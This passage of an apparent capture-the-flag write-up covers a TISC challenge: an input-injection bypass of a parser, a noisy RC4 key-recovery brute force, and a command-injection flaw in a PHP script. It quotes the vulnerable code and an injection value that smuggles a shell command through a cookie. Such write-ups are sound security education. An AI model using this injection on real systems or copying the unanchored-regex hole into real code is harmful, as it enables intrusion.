It is actually possible to bypass the lookup table step. parser.py actually returns <input>,<c_value>. The executable parses this to obtain the <c_value> integer which gets added to setup_winfilename_check. It’s possible to attack this logic by sending a fake c value in your input. For instance by sending “wtv,42” as an input, parser.py would return wtv,42,0, which the executable parses to obtain the value 42. This is a pretty useful bypass as the lookup table method involves sending many inputs to the executable to eventually get setup_winfilename_check to the value we need it to be. The I/O is extremely time-consuming, especially when you consider that we use it as part of a brute-forcing algorithm.

Next, in my solve, I actually implemented the paper incorrectly! The key differential used to brute-force the oracle is supposed to be all zeroes except for the recovered bytes/nibbles. Instead, I wrongly set those bytes to random values. This led to some noise in the key recovery process, giving me the primary key of b390c2bac4a3c690 instead of c390c2bac4a3c690, just 1 bit off! I spent 1 whole day debugging my code, but I never actually realised my improper implementation until after solving the challenge and talking to the author. Instead, I did some experimentation on random keys and found out that there was noise in my key recovery process. However, the noise was always minimal, with the key I recovered and the true key usually differing by at most 5 nibbles, by 3 bits each. This would not be brute-forceable by the most obvious means – plugging the result into decrypt-flag.php and checking if the output started with TISC{ – because the decryption algorithm involved running SHA256 on the key 0xffffff times, which is simply too time-consuming. Instead, I used a ‘side-channel’. I sent two different key differentials to the oracle and collected the keystream outputs. Since the plaintext (the dogekey) is the same for both, the correct primary key would decrypt both outputs to the same value. The RC4 decryption algorithm is fast, so it is possible to use this side-channel to determine if the primary key was correct. Using this technique to brute-force the primary key (from a starting point of b390c2bac4a3c690), I quickly found the correct primary key of c390c2bac4a3c690.

Trivia

I was the first to discover the arbitrary file read (the challenge author told me afterwards), and thus also the first to audit the PHP source code. Here was the original version of start.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$aa = explode("\x80", base64_decode($uid));
if (!preg_match("/[\dabcdef]{16}/u",$aa[1])) {
	header("Location: /");
	die();
}

$uid = $aa[1];
exec("reg query HKCU\dogeGPT\ -v pri_key", $a1);
$pri = explode("    ", $a1[2])[3];

exec("reg query HKCU\dogeGPT\ -v dogekey", $a2);
$f = explode("    ", $a2[2])[3];        

$ef = enc($pri, $uid, $f);

$ip = $_SERVER['REMOTE_ADDR'];
$pt = rand(20000, 47000);
popen("start /b C:\\dogeGPT\\dogeGPT.exe " . $ef . " " . $ip . " " . $uid . " " . $pt, 'r');

PHP veterans will probably quickly spot the vulnerability here; there’s a command injection in the uid variable! Recall that uid is a cookie that we can set, and thus we control the value of $aa[1] entirely. The preg_match regex tries to ensure that $aa[1] is a 16 character hexadecimal string. However, this is a common PHP regex mistake – as long as any part of the string matches the regex, preg_match returns true. Thus, if $aa[1] is && echo 'pwned' && abcdabcdabcdabcd, the last segment will pass the regex, while the initial segment serves as a command injection into the popen call with $uid as a parameter. From here, leaking the dogekey from the registry becomes trivial, bypassing the whole RC4 key recovery section.

As I was playing around with the RCE, I dropped some files on remote which were noticed by the challenge author, who quickly took the server down to triage. Eventually, this RCE was patched out of start.php, resulting in the final version everyone else saw.

Final remarks

Overall, I really enjoyed this iteration of TISC. Kudos to my fellow competitors and shout-out to all the community challenge creators! The challenges were easier this year and understandably so. Personally, I think there is value in raising the difficulty – I guess there is something fun about bashing your head till you find TrueCrypt after all.

Hopefully next year I’ll actually submit a challenge…